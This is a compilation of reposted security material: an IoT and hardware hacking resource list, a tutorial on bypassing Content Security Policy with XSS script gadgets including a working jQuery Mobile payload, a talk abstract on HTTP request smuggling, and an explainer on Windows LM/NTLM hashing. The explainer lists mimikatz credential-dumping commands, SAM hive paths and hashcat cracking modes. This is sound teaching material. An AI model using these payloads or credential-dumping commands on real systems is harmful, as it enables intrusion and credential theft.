Firmware Hardware Hacking Handbook
inside radio attack and defense

Blogs for iotpentest

https://payatu.com/blog/
http://jcjc-dev.com/
https://w00tsec.blogspot.in/
http://www.devttys0.com/
https://www.rtl-sdr.com/
https://keenlab.tencent.com/en/
https://courk.cc/
https://iotsecuritywiki.com/
https://cybergibbons.com/
http://firmware.re/
https://iotmyway.wordpress.com/
http://blog.k3170makan.com/
https://blog.tclaverie.eu/
http://blog.besimaltinok.com/category/iot-pentest/
https://ctrlu.net/
http://iotpentest.com/
https://blog.attify.com
https://duo.com/decipher/
http://www.sp3ctr3.me
http://blog.0x42424242.in/
https://dantheiotman.com/
https://blog.danman.eu/
https://quentinkaiser.be/
https://blog.quarkslab.com
https://blog.ice9.us/
https://labs.f-secure.com/
https://mg.lol/blog/
https://cjhackerz.net/

Awesome CheatSheets

Hardware Hacking
Nmap

Search Engines for IoT Devices

Shodan
FOFA
Censys
Zoomeye
ONYPHE

CTF For IoT's And Embedded

https://github.com/hackgnar/ble_ctf
https://www.microcorruption.com/
https://github.com/Riscure/Rhme-2016
https://github.com/Riscure/Rhme-2017
https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html
https://github.com/scriptingxss/IoTGoat

YouTube Channels for IoT Pentesting

Liveoverflow
Binary Adventure
EEVBlog
JackkTutorials
Craig Smith
iotpentest [Mr-IoT]
Besim ALTINOK - IoT - Hardware - Wireless
Ghidra Ninja
Cyber Gibbons

Vehicle Security Resources

https://github.com/jaredthecoder/awesome-vehicle-security

IoT security vulnerabilities checking guides

Reflecting upon OWASP TOP-10 IoT Vulnerabilities
OWASP IoT Top 10 2018 Mapping Project
Firmware Pentest Guide
Hardware toolkits for IoT security analysis

IoT Gateway Software

Webthings by Mozilla - RaspberryPi

Labs for Practice

IoT Goat

IoT Pentesting OSes

Sigint OS - LTE IMSI Catcher
Instant-gnuradio OS - For Radio Signals Testing
AttifyOS - IoT Pentest OS - by Aditya Gupta
Ubuntu Best Host Linux for IoT's - Use LTS
Internet of Things - Penetration Testing OS
Dragon OS - DEBIAN LINUX WITH PREINSTALLED OPEN SOURCE SDR SOFTWARE
EmbedOS - Embedded security testing virtual machine

Exploitation Tools

Expliot - IoT Exploitation framework - by Aseemjakhar
A Small, Scalable Open Source RTOS for IoT Embedded Devices
Skywave Linux - Software Defined Radio for Global Online Listening
Routersploit (Exploitation Framework for Embedded Devices)
IoTSecFuzz (comprehensive testing for IoT device)

Reverse Engineering Tools

IDA Pro
GDB
Radare2 | cutter
Ghidra

Introduction

Introduction to IoT
IoT Architecture
IoT attack surface
IoT Protocols Overview

MQTT

Introduction
Hacking the IoT with MQTT
thoughts about using IoT MQTT for V2V and Connected Car from CES 2014
Nmap
The Seven Best MQTT Client Tools
A Guide to MQTT by Hacking a Doorbell to send Push Notifications
Are smart homes vulnerable to hacking

Softwares

Mosquitto
HiveMQ
MQTT Explorer

CoAP

Introduction
CoAP client Tools
CoAP Pentest Tools
Nmap

Automobile

CanBus

Introduction and protocol Overview
PENTESTING VEHICLES WITH CANTOOLZ
Building a Car Hacking Development Workbench: Part1
CANToolz - Black-box CAN network analysis framework
PLAYING WITH CAN BUS

Radio IoT Protocols Overview

Understanding Radio Signal Processing
Software Defined Radio
Gnuradio
Creating a flow graph
Analysing radio signals
Recording specific radio signal
Replay Attacks

Base transceiver station (BTS)

what is base transceiver station
How to Build Your Own Rogue GSM BTS

GSM & SS7 Pentesting

Introduction to GSM Security
GSM Security 2
vulnerabilities in GSM security with USRP B200
Security Testing 4G (LTE) Networks
Case Study of SS7/SIGTRAN Assessment
Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP
ss7MAPer – A SS7 pen testing toolkit
Introduction to SIGTRAN and SIGTRAN Licensing
SS7 Network Architecture
Introduction to SS7 Signaling
Breaking LTE on Layer Two

Zigbee & Zwave

Introduction and protocol Overview
Hacking Zigbee Devices with Attify Zigbee Framework
Hands-on with RZUSBstick
ZigBee & Z-Wave Security Brief

BLE

Intro and SW & HW Tools
Step By Step guide to BLE
Understanding and Exploiting Traffic Engineering in a Bluetooth Piconet
BLE Characteristics
Reconnaissance (Active and Passive) with HCI Tools
btproxy
hcitool & bluez
Testing With GATT Tool
Cracking encryption
bettercap
BtleJuice Bluetooth Smart Man-in-the-Middle framework
gattacker
BTLEjack Bluetooth Low Energy Swiss army knife

Hardware

NRFCONNECT - 52840
EDIMAX
CSR 4.0
ESP32 - Development and learning Bluetooth
Ubertooth
Sena 100

BLE Pentesting Tutorials

Bluetooth vs BLE Basics
Intel Edison as Bluetooth LE — Exploit box
How I Reverse Engineered and Exploited a Smart Massager
My journey towards Reverse Engineering a Smart Band — Bluetooth-LE RE
Bluetooth Smartlocks
I hacked MiBand 3
GATTacking Bluetooth Smart Devices

Mobile security (Android & iOS)

Android App Reverse Engineering 101
Android Application pentesting book
Android Pentest Video Course-TutorialsPoint
IOS Pentesting
OWASP Mobile Security Testing Guide
Android Tamer - Android Tamer is a Virtual / Live Platform for Android Security professionals

Online Assemblers

AZM Online Arm Assembler by Azeria
Online Disassembler
Compiler Explorer is an interactive online compiler which shows the assembly output of compiled C++, Rust, Go

ARM

Azeria Labs
ARM EXPLOITATION FOR IoT
Damn Vulnerable ARM Router (DVAR)
EXPLOIT.EDUCATION

Pentesting Firmwares and emulating and analyzing

Firmware analysis and reversing
Firmware emulation with QEMU
Dumping Firmware using Buspirate
Reversing ESP8266 Firmware
Emulating Embedded Linux Devices with QEMU
Emulating Embedded Linux Systems with QEMU
Fuzzing Embedded Linux Devices
Emulating ARM Router Firmware
Reversing Firmware With Radare
Samsung Firmware Magic

Firmware samples to pentest

Download From here

IoT hardware Overview

IoT Hardware Guide

Hardware Gadgets to pentest

Bus Pirate
EEPROM reader/SOIC Cable
Jtagulator/Jtagenum
Logic Analyzer
The Shikra
FaceDancer21 (USB Emulator/USB Fuzzer)
RfCat
Hak5Gear - Hak5FieldKits
Ultra-Mini Bluetooth CSR 4.0 USB Dongle Adapter
Attify Badge - UART, JTAG, SPI, I2C (w/ headers)

Attacking Hardware Interfaces

Serial Terminal Basics
Reverse Engineering Serial Ports
REVERSE ENGINEERING ARCHITECTURE AND PINOUT OF CUSTOM ASICS

UART

Identifying UART interface
onewire-over-uart
Accessing sensor via UART
Using UART to connect to a chinese IP cam
A journey into IoT – Hardware hacking: UART

JTAG

Identifying JTAG interface
NAND Glitching Attack

SideChannel Attacks

All Attacks

Awesome IoT Pentesting Guides

Shodan Pentesting Guide
Car Hacking Practical Guide 101
OWASP Firmware Security Testing Methodology

Vulnerable IoT and Hardware Applications

IoT : https://github.com/Vulcainreo/DVID
Safe : https://insinuator.net/2016/01/damn-vulnerable-safe/
Router : https://github.com/praetorian-code/DVRF
SCADA : https://www.slideshare.net/phdays/damn-vulnerable-chemical-process
PI : https://whitedome.com.au/re4son/sticky-fingers-dv-pi/
SS7 Network: https://www.blackhat.com/asia-17/arsenal.html#damn-vulnerable-ss7-network
VoIP : https://www.vulnhub.com/entry/hacklab-vulnvoip,40/

Follow the people

Jilles
Aseem Jakhar
Cybergibbons
Ilya Shaposhnikov
Mark C.
A-a-ron Guzman
Arun Mane
Yashin Mehaboobe
Arun Magesh

Sursa: https://github.com/V33RU/IoTSecurity101
-
Bypassing modern XSS mitigations with code-reuse attacks

Alexander Andersson 2020-04-03 Cyber Security

Cross-site Scripting (XSS) has been around for almost two decades, yet it is still one of the most common vulnerabilities on the web. Many second-line mechanisms have therefore evolved to mitigate the impact of the seemingly endless flow of new vulnerabilities. Quite often I meet the misconception that these second-line mechanisms can be relied upon as the single protection against XSS. Today we'll see why this is not the case. We'll explore a relatively new technique in the area named code-reuse attacks. Code-reuse attacks for the web were first described in 2017 and can be used to bypass most modern browser protections including: HTML sanitizers, WAFs/XSS filters, and most Content Security Policy (CSP) modes.

Introduction

Let's do a walkthrough using an example:

1 <?php
2 /* File: index.php */
3 // CSP disabled for now, will enable later
4 // header("Content-Security-Policy: script-src 'self' 'unsafe-eval'; object-src 'none';");
5 ?>
6
7 <!DOCTYPE html>
8 <html lang="en">
9 <body>
10 <div id="app">
11 </div>
12 <script src="http://127.0.0.1:8000/main.js"></script>
13 </body>
14 </html>

1 /** FILE: main.js **/
2 var ref=document.location.href.split("?injectme=")[1];
3 document.getElementById("app").innerHTML = decodeURIComponent(ref);

The app has a DOM-based XSS vulnerability. Main.js gets the value of the GET parameter "injectme" and inserts it into the DOM as raw HTML. This is a problem because the user can control the value of the parameter. The user can therefore manipulate the DOM at will. The request below is a proof of concept that we can inject arbitrary JavaScript. Before sending the request, we first start a local test environment on port 8000 (php -S 127.0.0.1 8000).
1 http://127.0.0.1:8000/?injectme=<img src="n/a" onerror="alert('XSS')"/>

The image element will be inserted into the DOM and it will error during load, which triggers the onerror event handler. This gives an alert popup saying "XSS", proving that we can make the app run arbitrary JavaScript.

Now enable Content Security Policy by removing the comment on line 4 in index.php. Then reload the page and you'll see that the attack failed. If you open the developer console in your browser, you'll see a message explaining why. Cool! So what happened? The IMG HTML element was created, the browser saw an onerror event attribute but refused to execute the JavaScript because of the CSP.

Bypassing CSP with an unrealistically simple gadget

The CSP in our example says that:

– JavaScript from the same host (self) is allowed
– Dangerous functions such as eval are allowed (unsafe-eval)
– All other scripts are blocked
– All objects are blocked (e.g. flash)

We should add that it is always up to the browser to actually respect the CSP. But if it does, we can't just inject new JavaScript, end of discussion. But what if we could somehow trigger already existing JavaScript code that is within the CSP whitelist? If so, we might be able to execute arbitrary JavaScript without violating the policy. This is where the concept of gadgets comes in. A script gadget is a piece of legitimate JavaScript code that can be triggered via, for example, an HTML injection. Let's look at a simple example of a gadget to understand the basic idea.
Assume that the main.js file looked like this instead:

1 /** FILE: main.js **/
2 var ref = document.location.href.split("?injectme=")[1];
3 document.getElementById("app").innerHTML = decodeURIComponent(ref);
4
5 document.addEventListener("DOMContentLoaded", function() {
6     var expression = document.getElementById("expression").getAttribute("data");
7     var parsed = eval(expression);
8     document.getElementById("result").innerHTML = '<p>'+parsed+'</p>';
9 });

The code is basically the same, but this time our target also has some kind of math calculator. Notice that only main.js is changed; index.php is the same as before. You can think of the math function as some legacy code that is not really used. As attackers, we can abuse/reuse the math calculator code to reach an eval and execute JavaScript without violating the CSP. We don't need to inject JavaScript. We just need to inject an HTML element with the id "expression" and an attribute named "data". Whatever is inside data will be passed to eval. We give it a shot, and yay! We bypassed the CSP and got an alert!

Moving on to realistic script gadgets

Websites nowadays include a lot of third-party resources, and it is only getting worse. These are all legitimate whitelisted resources even if there is a CSP enforced. Maybe there are interesting gadgets in those millions of lines of JavaScript? Well yes! Lekies et al. (2017) analyzed 16 widely used JavaScript libraries and found multiple gadgets in almost all of them. There are several types of gadgets, and they can be directly useful or require chaining with other gadgets to be useful.

String manipulation gadgets: Useful to bypass pattern-based mitigation.
Element construction gadgets: Useful to bypass XSS mitigations, for example to create script elements.
Function creation gadgets: Can create new Function objects that can later be executed by a second gadget.
JavaScript execution sink gadgets: Similar to the example we just saw; can either stand alone or be the final step in a chain.
Gadgets in expression parsers: These abuse the framework-specific expression language used in templates.

Let's take a look at another example. We will use the same app, but now let's include jQuery Mobile.

<?php
/** FILE: index.php **/
header("Content-Security-Policy: script-src 'self' https://code.jquery.com:443 'unsafe-eval'; object-src 'none';");
?>

<!DOCTYPE html>
<html lang="en">
<body>
<p id="app"></p>
<script src="http://127.0.0.1:8000/main.js"></script>
<script src="https://code.jquery.com/jquery-1.8.3.min.js"></script>
<script src="https://code.jquery.com/mobile/1.2.1/jquery.mobile-1.2.1.min.js"></script>
</body>
</html>

/** FILE: main.js **/
var ref = document.location.href.split("?injectme=")[1];
document.getElementById("app").innerHTML = decodeURIComponent(ref);

The CSP has been slightly changed to allow anything from code.jquery.com, and luckily for us, jQuery Mobile has a known script gadget that we can use. This gadget can also bypass CSP with strict-dynamic. Let's start by considering the following HTML.

<div data-role=popup id='hello world'></div>

This HTML will trigger code in jQuery Mobile's Popup widget. What might not be obvious is that when you create a popup, the library writes the id attribute into an HTML comment. That piece of jQuery Mobile code is a gadget we can abuse to run JavaScript: we just need to break out of the comment, and then we can do whatever we want. Our final payload will look like this:

<div data-role=popup id='--!><script>alert("XSS")</script>'></div>

Execute, and boom!

Some final words

This has been an introduction to code-reuse attacks on the web, and we've seen an example of a real-world script gadget in jQuery Mobile.
We've only seen CSP bypasses, but as mentioned, this technique can be used to bypass HTML sanitizers, WAFs, and XSS filters such as NoScript as well. If you are interested in diving deeper, I recommend reading the paper from Lekies et al. and specifically looking into gadgets in expression parsers. These gadgets are very powerful, as they do not rely on innerHTML or eval. There is no doubt that mitigations such as CSP should be enforced, as they raise the bar for exploitation. However, they must never be relied upon as the single layer of defense. Spend your focus on actually fixing your vulnerabilities. The fundamental principle is that you need to properly encode user-controlled data. The characters in need of encoding will vary based on the context in which the data is inserted. For example, there is a difference between inserting data inside tags (e.g. <div>HERE</div>), inside a quoted attribute (e.g. <div title="HERE"></div>), in an unquoted attribute (e.g. <div title=HERE></div>), and in an event attribute (e.g. <div onmouseenter="HERE"></div>). Make sure to use a framework that is secure by default and read up on the pitfalls of your specific framework. Also, never use the dangerous functions that completely bypass the built-in security, such as trustAsHtml in Angular and dangerouslySetInnerHTML in React.

Want to learn more? Besides being a security consultant performing penetration tests, Alexander is a popular instructor. If you want to learn more about XSS mitigations and code-reuse attacks, and learn how hackers attack your environment, check out his 3-day training: Secure Web Development and Hacking for Developers.

Sursa: https://blog.truesec.com/2020/04/03/bypassing-modern-xss-mitigations-with-code-reuse-attacks/
-
HTTP requests are traditionally viewed as isolated, standalone entities. In this session, I'll introduce techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties. By James Kettle Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
-
Windows authentication attacks – part 1

In order to understand attacks such as pass the hash, relaying, and Kerberos attacks, one should have pretty good knowledge of the Windows authentication/authorization process. That's what we're going to achieve in this series. In this part we're discussing the different types of Windows hashes and focusing on the NTLM authentication process.

Arabic

I illustrated most of the concepts in this blog post in Arabic in the following video. It doesn't contain all the details in the post, but it will get you the fundamentals you need to proceed with the next parts.

Windows hashes

LM hashes

LM was the dominant password storage algorithm on Windows until Windows XP / Windows Server 2003. It has been disabled by default since Windows Vista / Windows Server 2008. LM was a weak hashing algorithm for many reasons; you will figure these reasons out once you know how LM hashing works.

LM hash generation

Let's assume that the user's password is PassWord

1 – All characters are converted to upper case: PassWord -> PASSWORD

2 – If the password is shorter than 14 characters, it is padded with null characters so its length becomes 14, so the result will be PASSWORD000000 (the zeros representing null bytes)

3 – These 14 characters are split into two halves: PASSWOR and D000000

4 – Each half is converted to bits, and after every 7 bits a parity bit (0) is added, so the result is a 64-bit key, e.g. 1101000 -> 11010000. As a result, we get two keys from the two pre-generated halves after adding these parity bits

5 – Each of these keys is then used to encrypt the string "KGS!@#$%" using the DES algorithm in ECB mode, so that the result is
PASSWOR = E52CAC67419A9A22
D000000 = 4A3B108F3FA6CB6D

6 – The outputs of the two halves are then concatenated, and that makes our LM hash: E52CAC67419A9A224A3B108F3FA6CB6D

You can get the same result using the following python line.
python -c 'from passlib.hash import lmhash; print(lmhash.hash("password"))'

Disadvantages

As you may already suspect, this is a very weak algorithm. Each hash has a lot of possibilities; for example, the hashes of the following passwords

Password1
pAssword1
PASSWORD1
PassWord1
...

will all be the same! Let's assume a password like passwordpass123: the upper- and lowercase combinations alone give more than 32,000 possibilities, and all of them have the same hash! You can give it a try:

import itertools
len(list(map(''.join, itertools.product(*zip("Passwordpass123".upper(), "Passwordpass123".lower())))))

Also, splitting the password into two halves makes things easier, as the attacker only has to brute force a seven-character password! LM hashes accept only the 95 printable ASCII characters, and since all lowercase characters are converted to upper case, that leaves only 69 possibilities per character, which makes just 7.5 trillion (69^7) possibilities for each half instead of the total of 69^14 for the whole 14 characters. Rainbow tables already exist containing all these possibilities, so cracking LAN Manager hashes isn't a problem at all. Moreover, in case the password is seven characters or less, the attacker doesn't need to brute force the 2nd half at all, as it has the fixed value of AAD3B435B51404EE

Example

Creating a hash for password123 and cracking it. You will notice that john got me the password "PASSWORD123" in upper case and not "password123", and yes, both are valid. Obviously, the whole LM hashing scheme was based on the assumption that no one would reverse it and that no one would get into the internal network to be in a MITM position to capture it. As mentioned earlier, LM hashes are disabled by default since Windows Vista / Windows Server 2008.

NTLM hash (NTHash)

NTHash, AKA NTLM hash, is the currently used algorithm for storing passwords on Windows systems.
Net-NTLM, on the other hand, is the name of the authentication or challenge/response protocol used between the client and the server. If you have done a hash dump or a pass-the-hash attack before, no doubt you've seen NTLM hashes already. You can obtain them via:

Dumping credentials from memory using mimikatz, e.g. sekurlsa::logonpasswords

Dumping the SAM using
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SAM
then reading the hashes offline via mimikatz:
lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv

And of course via NTDS, where NTLM hashes are stored in Active Directory environments. You're going to need administrator access over the domain controller (domain admin privileges, for example), and you can do this either manually or using DCSync within mimikatz as well.

NTLM hash generation

Converting a plaintext password into NTLM isn't complicated; it depends mainly on the MD4 hashing algorithm:

1 – The password is converted to Unicode (UTF-16-LE)

2 – MD4 is then used to convert it to the NTLM hash, just like MD4(UTF-16-LE(password))

Even when cracking the hash fails, it can be abused using the pass-the-hash technique, as illustrated later. Since no salt is used while generating the hash, cracking an NTLM hash can be done either by using pre-generated rainbow tables or using hashcat:

hashcat -m 1000 -a 3 hashes.txt

Net-NTLMv1

This isn't used to store passwords; it's actually a challenge/response protocol used for client/server authentication in order to avoid sending the user's hash over the network. That's basically how Net-NTLM authentication works in general. I will discuss how the protocol works in detail, but all you need to know for now is that Net-NTLMv1 isn't used anymore by default, except on some old versions of Windows. A Net-NTLMv1 hash looks like

username::hostname:response:response:challenge

It can't be used directly to pass the hash, yet it can be cracked or relayed as I will mention later.
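The NTLM generation just described (MD4 over the UTF-16-LE password) can be sketched in pure Python. Because hashlib's md4 is unavailable on many modern OpenSSL builds, this sketch carries its own minimal MD4 implementation following RFC 1320; treat it as an illustration rather than production code:

```python
import struct

def _rol(x: int, n: int) -> int:
    # 32-bit left rotation
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    # RFC 1320 padding: 0x80, zeros, then the 64-bit little-endian bit length
    bit_len = struct.pack('<Q', len(data) * 8)
    data = data + b'\x80' + b'\x00' * ((55 - len(data)) % 64) + bit_len

    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    # (round function, constant, message-word order, per-step shifts)
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(data), 64):
        X = struct.unpack('<16I', data[off:off + 64])
        a, b, c, d = A, B, C, D
        for f, const, order, shifts in rounds:
            for i, k in enumerate(order):
                t = _rol((a + f(b, c, d) + X[k] + const) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, t, b, c   # rotate the working variables
        A = (A + a) & 0xFFFFFFFF
        B = (B + b) & 0xFFFFFFFF
        C = (C + c) & 0xFFFFFFFF
        D = (D + d) & 0xFFFFFFFF
    return struct.pack('<4I', A, B, C, D)

def ntlm_hash(password: str) -> str:
    # NTLM (NTHash) = MD4 over the UTF-16-LE encoded password
    return md4(password.encode('utf-16-le')).hex().upper()

print(ntlm_hash("P@ssw0rd"))  # E19CCF75EE54E06B06A5907AF13CEF42
```

The printed value matches the NT hash of P@ssw0rd used later in the NTLMv1 walkthrough.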
Since the challenge is variable, you can't use rainbow tables against a Net-NTLMv1 hash, but you can crack it by brute-forcing the password with hashcat:

hashcat -m 5500 -a 3 hashes.txt

This differs from NTLMv1-SSP, in which the server challenge is altered on the client side. NTLMv1 and NTLMv1-SSP are treated differently during cracking or even downgrading; this will be discussed in the NTLM attacks part.

Net-NTLMv2

A lot of improvements were made over v1; this is the version used nowadays on Windows systems. The authentication steps are the same, except for the challenge-response generation algorithm and the challenge-response length, which in this case is variable instead of the fixed length used in Net-NTLMv1. In Net-NTLMv2, several parameters are added by the client, such as a client nonce, the server nonce, and a timestamp, as well as the username, and these are encrypted together; that's why you will find that the length of Net-NTLMv2 hashes varies from user to user. Net-NTLMv2 can't be used for pass-the-hash attacks or for offline relay attacks, due to the security improvements made. But it can still be relayed or cracked; the process is slower, but applicable. I will discuss that later as well. A Net-NTLMv2 hash looks like (in the hashcat format)

username::DOMAIN:server challenge:NTProofStr:blob

It can be cracked using

hashcat -m 5600 hash.txt

Net-NTLM Authentication

In a nutshell

Let's assume that our client (192.168.18.132) is being used to connect to the Windows Server 2008 machine (192.168.18.139). That server isn't domain-joined, which means that the whole authentication process is going to happen between the client and the server without having to contact any other machine, unlike what may happen in the 2nd scenario. The whole authentication process can be illustrated in the following picture.
Client IP: 192.168.18.132 [Kali Linux]
Server IP: 192.168.18.139 [Windows Server 2008, non-domain joined]

0 – The user enters his/her username and password.

1 – The client initiates a negotiation request with the server; that request includes information about the client capabilities as well as the dialects, i.e. the protocol versions that the client supports.

2 – The server picks the highest dialect and replies through the negotiation response message, then the authentication starts.

3 – The client then negotiates an authentication session with the server to ask for access. This request also contains some information about the client, including the NTLM 8-byte signature ('N', 'T', 'L', 'M', 'S', 'S', 'P', '\0').

4 – The server responds to the request by sending an NTLM challenge.

5 – The client then encrypts that challenge with the hash of the pre-entered password and sends the username, challenge, and challenge-response back to the server (additional data is sent when using Net-NTLMv2).

6 – The server tries to encrypt the challenge as well, using its own copy of the user's hash, which is stored locally on the server in case of local authentication, or passes the information to the domain controller in case of domain authentication. It compares the result to the challenge-response; if they are equal, the login is successful.

1-2 : negotiation request/response

Launch Wireshark and initiate the negotiation process using the following python lines:

from impacket.smbconnection import SMBConnection, SMB_DIALECT
myconnection = SMBConnection("jnkfo","192.168.18.139")

These two lines represent the first two negotiation steps of the previous picture without proceeding with the authentication process. Using the "smb or smb2" filter during the negotiation request, you will notice that the client was negotiating over the SMB protocol, yet the server replied using SMB2 and the client renegotiated using SMB2! It's simply the dialects.
By inspecting the packet you will find the following: as mentioned earlier, the client offers the dialects it supports, and the server picks whichever it wants to use; by default it picks the one with the highest level of functionality that both client and server support. If the best is SMB2, then let it be SMB2. You can, however, enforce a certain dialect (assuming the server supports it) using

myconnection.negotiateSession(preferredDialect="NT LM 0.12")

The dialect NT LM 0.12 was sent, the server responded using SMB, and it will use the same protocol for the rest of the authentication process. Needless to say, the LM response isn't supported by default anymore since Windows Vista / Windows Server 2008.

3 – Session Setup Request (Type 1 message)

The following line will initiate the authentication process.

myconnection.login("Administrator", "P@ssw0rd")

The "Session Setup Request" packet contains information such as the ['N', 'T', 'L', 'M', 'S', 'S', 'P', '\0'] signature, negotiation flags indicating the options supported by the client, and the NTLM message type, which must be 1. An interesting flag is NTLMSSP_NEGOTIATE_TARGET_INFO, which asks the server to send back some useful information, as will be seen in step number 4. Another interesting flag is NEGOTIATE_SIGN, which has a great deal to do with relay attacks, as will be mentioned later.

4 – Session Setup Response (Type 2 message)

In the response, we get back the NTLMSSP signature again. The message type must be 2 in this case. We also get the target name and the target info, thanks to the NTLMSSP_NEGOTIATE_TARGET_INFO flag we sent earlier, which provides us with a wealth of information about the target! A good example is getting the domain name of Exchange servers externally. The most important part is the NTLM challenge, or nonce.
5 – Session Setup Request (Type 3 message)

Long story short, the client needs to prove that it knows the user's password without sending the plaintext password, or even the NTLM hash, directly over the network. So instead it goes through a procedure in which it creates the NT hash, uses it to encrypt the server's challenge, and sends the result back to the server along with the username. That's how the process works in general. In NTLMv2, the client hashes the user's pre-entered plaintext password into NTLM using the pre-mentioned algorithm, then proceeds with the challenge-response generation. The elements of the NTLMv2 hash are:

– The upper-case username
– The domain or target name

HMAC-MD5 is applied to this combination using the NTLM hash of the user's password as the key, which makes the NTLMv2 hash. A blob block is then constructed containing:

– A timestamp
– A client nonce (8 bytes)
– The target information block from the type 2 message

This blob is concatenated with the challenge from the type 2 message and then encrypted using the NTLMv2 hash as a key via the HMAC-MD5 algorithm. Lastly, this output is concatenated with the previously constructed blob to form the NTLMv2-SSP challenge-response (type 3 message). So basically:

NTLMv2_response = HMAC-MD5(challenge + blob, using the NTLMv2 hash as a key)

and the challenge-response is NTLMv2_response + blob.

Out of curiosity, and just to know the difference between NTLMv1 and v2: how is the NTLMv1 response calculated?
1 – The NTLM hash of the plaintext password is calculated as pre-mentioned, using the MD4 algorithm; so, assuming that the password is P@ssw0rd, the NTLM hash will be E19CCF75EE54E06B06A5907AF13CEF42

2 – These 16 bytes are then padded to 21 bytes, so it becomes E19CCF75EE54E06B06A5907AF13CEF420000000000

3 – This value is split into three 7-byte thirds:

0xE19CCF75EE54E0
0x6B06A5907AF13C
0xEF420000000000

4 – These 3 values are used to create three 64-bit DES keys by adding parity bits after every 7 bits, as usual. So for the 1st key, 0xE19CCF75EE54E0 is

11100001 10011100 11001111 01110101 11101110 01010100 11100000

and after the 8 parity bits are added it becomes

11100000 11001110 00110010 11101110 01011110 01110010 01010010 11000000

In hex: 0xE0CE32EE5E7252C0. The same goes for the other 2 keys.

5 – Each of the three keys is then used to encrypt the challenge obtained from the type 2 message.

6 – The 3 results are combined to form the 24-byte NTLM response.

So in NTLMv1, there is no client nonce or timestamp being sent to the server; keep that in mind for later.

6 – Session Setup Response

The server receives the type 3 message, which contains the challenge-response. The server has its own copy of the user's NTLM hash, the challenge, and all the other information needed to calculate its own challenge-response message, and it compares the output it has generated with the output it got from the client. Needless to say, if the NT hash used to encrypt the data on the client side differs from the NT hash of the user's password stored on the server (i.e. the user entered the wrong password), the challenge-response won't match the server's output, and thus the user gets an ACCESS_DENIED or LOGON_FAILURE message. If the user entered the correct password, the NT hash will be the same, the encryption (challenge-response) result will be the same on both sides, and the login will succeed.
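The parity-bit key expansion in step 4 (the same expansion used in step 4 of the LM algorithm earlier) can be sketched as a small stdlib-only helper. The DES encryption of the challenge itself would need a third-party library such as pycryptodome, so it is omitted here:

```python
def add_parity_bits(half: bytes) -> bytes:
    # Expand a 7-byte value into an 8-byte DES key:
    # after every 7 bits, append a 0 parity bit
    bits = ''.join(f'{byte:08b}' for byte in half)
    return bytes(int(bits[i:i + 7] + '0', 2) for i in range(0, 56, 7))

# First third of the padded NTLM hash of P@ssw0rd, from step 3 above
print(add_parity_bits(bytes.fromhex('e19ccf75ee54e0')).hex())  # e0ce32ee5e7252c0
```

The output matches the 0xE0CE32EE5E7252C0 key worked out by hand above.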
That's how the full authentication process happens without directly sending or receiving the NTLM hash or the plaintext password over the network.

NTLM authentication in a Windows domain environment

The process is the same as mentioned before, except for the fact that domain users' credentials are stored on the domain controllers. So the challenge-response validation [type 3 message] will lead to establishing a Netlogon secure channel with the domain controller, where the passwords are saved. The server sends the domain name, username, challenge, and challenge-response to the domain controller, which determines whether the user has the correct password based on the hash saved in the NTDS file (unlike the previous scenario, in which the hash was stored locally in the SAM). So from the server side, you will find the following 2 extra RPC_NETLOGON messages to and from the domain controller, and if everything is OK, it will just send the session key back to the server in the RPC_NETLOGON response message.

NTLMSSP

To fully understand that mechanism you can't go without knowing a few things about NTLMSSP. I will discuss this in brief and dig deeper into it in the attacks part.

From Wikipedia:

NTLMSSP (NT LAN Manager (NTLM) Security Support Provider) is a binary messaging protocol used by the Microsoft Security Support Provider Interface (SSPI) to facilitate NTLM challenge-response authentication and to negotiate integrity and confidentiality options. NTLMSSP is used wherever SSPI authentication is used including Server Message Block / CIFS extended security authentication, HTTP Negotiate authentication (e.g. IIS with IWA turned on) and MSRPC services. The NTLMSSP and NTLM challenge-response protocol have been documented in Microsoft's Open Protocol Specification.
SSP is a framework provided by Microsoft to handle the whole NTLM authentication and integrity process. Let's repeat the previous authentication process in terms of the NTLM SSPI:

1 – The client gets access to the user's credentials set via the AcquireCredentialsHandle function.

2 – The type 1 message is created by calling the InitializeSecurityContext function in order to start the authentication negotiation process, which will obtain an authentication token; the message is then forwarded to the server and contains the NTLMSSP 8-byte signature mentioned before.

3 – The server receives the type 1 message, extracts the token, and passes it to the AcceptSecurityContext function, which creates a local security context representing the client, generates the NTLM challenge, and sends it back to the client (type 2 message).

4 – The client extracts the challenge and passes it to the InitializeSecurityContext function, which creates the challenge-response (type 3 message).

5 – The server passes the type 3 message to the AcceptSecurityContext function, which validates whether the user is authenticated, as mentioned earlier.

These functions have nothing to do with the SMB protocol itself; they are related to NTLMSSP, so they're called whenever you trigger authentication using NTLMSSP, no matter which service you're calling.

How does NTLMSSP assure integrity?

To assure integrity, the SSP applies a Message Authentication Code (MAC) to the message. This can only be verified by the recipient and prevents manipulation of the message on the fly (in a MITM attack, for example). The signature is generated using a secret key by means of symmetric encryption, and that MAC can only be verified by a party possessing the key (the client and the server).
The key generation varies from NTLMv1 to NTLMv2.

In NTLMv1, the secret key is generated using MD4(NTHash).

In NTLMv2:

1 – The NTLMv2 hash is obtained as mentioned earlier
2 – The NTLMv2 blob is obtained as also mentioned earlier
3 – The server challenge is concatenated with the blob and encrypted with HMAC-MD5, using the NTLMv2 hash as a key
4 – That output is encrypted again with HMAC-MD5, again using the NTLMv2 hash as a key: HMAC-MD5(NTLMv2_hash, OUTPUT_FROM_STEP_3)

